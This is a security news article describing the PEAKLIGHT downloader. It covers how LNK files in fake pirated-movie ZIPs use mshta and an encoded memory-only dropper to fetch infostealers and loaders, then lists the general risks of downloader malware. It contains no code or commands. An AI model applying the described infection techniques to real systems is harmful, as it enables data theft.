PEAKLIGHT Downloader

Cybersecurity researchers have discovered a novel dropper designed to deploy subsequent malware stages, ultimately targeting Windows systems with information stealers and loaders.

This memory-only dropper decrypts and runs a PowerShell-based downloader, identified as PEAKLIGHT. The malware strains distributed through this method include Lumma Stealer, Hijack Loader (also known as DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot, all of which are offered as part of a malware-as-a-service (MaaS) model.

Initial Attack Vector and Attack Chain

The attack chain begins with a Windows shortcut (LNK) file that is downloaded through drive-by download methods, such as when users search for movies online. These LNK files are packaged in ZIP archives disguised as pirated films.

Once downloaded, the LNK file connects to a Content Delivery Network (CDN) that hosts an obfuscated, memory-only JavaScript dropper. This dropper then executes the PEAKLIGHT PowerShell downloader script on the victim's machine, which, in turn, contacts a Command-and-Control (C2) server to retrieve further payloads.

Researchers have observed various LNK file variations, with some using asterisks (*) as wildcards to invoke the legitimate mshta.exe binary, allowing the malicious code (i.e., the dropper) to be discreetly executed from a remote server.

PEAKLIGHT Hides Its Threatening Action behind Legitimate Movies

Similarly, the droppers have been found to contain both hex-encoded and Base64-encoded PowerShell payloads. These payloads are unpacked to run PEAKLIGHT, a tool designed to deploy subsequent malware on an infected system while also downloading a legitimate movie trailer, likely as a decoy.

PEAKLIGHT functions as an obfuscated PowerShell-based downloader within a multi-stage execution chain. It searches for ZIP archives in specific hard-coded file paths. If these archives are not found, the downloader contacts a CDN site to download the archive file and save it to the disk.

This is not the first instance of malware targeting users searching for pirated movies. In early June 2024, researchers uncovered a sophisticated infection chain that resulted in the deployment of Hijack Loader following an attempt to download a video file from a movie download site.

Downloaders Open the Door for More Specialized Malware

Downloader malware poses several significant dangers to both individuals and organizations:

• Initial Compromise: Downloader malware is often the first stage of a larger attack. Once installed, it can silently download and install additional malicious payloads, including more advanced malware.
• Data Theft: The additional payloads delivered by downloader malware can include information stealers that capture private data, such as login credentials, financial information, and personal details, leading to identity theft and financial loss.
• System Hijacking: Some downloader malware is designed to deploy remote access tools or backdoors, allowing attackers to gain control over the infected system. This can lead to unauthorized access to corporate networks, data breaches, and further system compromise.
• Ransomware Deployment: Downloader malware may be used to install ransomware, which can encrypt a victim's files and demand a ransom payment for their release. This can result in significant data loss and operational disruption.
• Increased Vulnerability: Once installed, downloader malware can weaken system defenses and create vulnerabilities that other types of malware can exploit. This makes it easier for attackers to deploy more dangerous or persistent threats.
• Network Propagation: Downloader malware can spread across networks, infecting other devices and systems within the same environment. This can cause widespread damage and increase the complexity of remediation efforts.
• Resource Drain: The malware can consume system resources such as CPU and bandwidth, leading to degraded performance and potential service outages. This can affect productivity and increase operational costs.
• Legal and Compliance Risks: Infected organizations may face legal and compliance issues, especially if the data breach involves sensitive or regulated information. This can result in fines, legal actions, and reputational damage.

Overall, downloader malware is a serious threat due to its role in facilitating further attacks and affecting the security and integrity of the affected systems and networks.